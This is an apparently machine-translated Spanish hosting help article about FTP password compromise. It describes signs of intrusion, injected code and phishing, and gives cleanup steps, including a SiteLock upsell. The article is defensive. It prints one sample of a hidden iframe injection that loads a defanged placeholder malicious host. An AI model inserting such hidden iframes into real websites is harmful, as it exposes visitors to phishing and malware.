Bup bip bop… iniciando secuencia 42…
¡Llegaron los robots! Han tomado el control y tradujeron esta página a tu idioma local. Sus corazoncitos de metal solo tienen las mejores intenciones. ¡Quieren ayudar! Dinos si están haciendo un buen trabajo con los botones al final de la página. Ve a la versión en inglés

¿Qué es un compromiso FTP?

Para mover archivos entre el equipo y el sitio Web, utilice el protocolo de transferencia de archivos (FTP). Como la mayoría de los casos de equipos de cosas, hay una contraseña asociada: Esto asegura que sólo aquellos que ha proporcionado la contraseña pueden tener acceso a los archivos.

Sin embargo, contraseñas simples son fáciles para los atacantes de adivinar, les concede acceso a los archivos de su sitio Web. Desde allí puede insertar código malicioso en su sitio, que puede dañar los equipos de los visitantes, Enrutándolas a otros sitios o instalar software malintencionado.

Si su cuenta se ha comprometido a través de FTP, se podrá identificar algunos de los indicadores de color rojo que debe informarle, así como los pasos que puede seguir para limpiar los archivos infectados y evitar daños mayores.

Identificación de un peligro de FTP

Hay algunos signos que su sitio de sido atacado, incluidas (pero ciertamente no se limita a):

  • Código incorrecto insertado en su sitio Web
  • Nuevos directorios con nombres extraños, especialmente con nombre después de bancos o sitios de redes sociales
  • Nuevos archivos con nombres extraños

Sin embargo, hay muchos tipos de compromisos, cada uno de los cuales tiene sus propias tarjetas de llamada.

Inyecciones malintencionadas

Después de poner en peligro la contraseña, los atacantes pueden colocar el código en su sitio que puede incluir contenido de suplantación de identidad o de software malintencionado. Normalmente, al ver el código del sitio Web, verá las inyecciones en la parte superior o inferior de los archivos. Además, a menudo se repetirá el código insertado en cada uno de los archivos afectados. Esto significa que es posible que pueda buscar este código y encontrar rápidamente al revisar el contenido. Éste es un ejemplo:

<iframename=Twitter scrolling=auto frameborder=no align=center height=5 width=1 ·src=hxxp://badsite.tld/badfile.php?id=someid</iframe>

Contenido de suplantación de identidad

Esquemas de phishing intentan robar información personal confidencial, como contraseñas, números de tarjetas de crédito y números de seguridad social. Normalmente, el atacante enviará correos basura a personas con vínculos a un sitio de suplantación de identidad que se hace pasar por un sitio Web legítimo, que es donde han establecido sus capturas. Para obtener más información, consulte ¿Qué es Phishing?

Protección del sitio

Hay algunas cosas que puede hacer si piensa que su sitio ha sido víctima de un atacante.

Restablecer la contraseña

Lo primero que debe hacer si piensa que su sitio se ve comprometida es cambiar la contraseña. Para obtener las instrucciones, consulte restablecer su nombre de usuario FTP y contraseña.

Si tiene un sitio Web que utiliza una base de datos, al igual que WordPress® por ejemplo, también debe cambiar la contraseña de la base de datos. Puede encontrar dicha información en Restablecer la contraseña de la base de datos MySQL.

La limpieza y restauración de su cuenta

Después de restablecer la contraseña, debe revisar todo el contenido de hospedaje y quite cualquier contenido malintencionado. Puede hacerlo mediante el Administrador de archivos de su panel de control (más información) o un cliente FTP (más información).

Si eso suena como algo no estás cómodo realizar (o simplemente no tiene tiempo), le ofrecemos un producto de seguridad denominado SiteLock que se eliminará contenido más dañinos para usted. Puede obtener más detalles acerca de él en nuestro sitio Web aquí.

Para la mayoría de los clientes, recomendamos el plan SiteLock Professional. Esto incluye el acceso a análisis de 360 grados de SiteLock junto con la eliminación de malware automático.


¿Este artículo fue útil?
Gracias por tus comentarios
¡Nos complace haber ayudado! ¿Hay algo más que podamos hacer por ti?
Lo sentimos. ¿Cómo podríamos ser de más utilidad?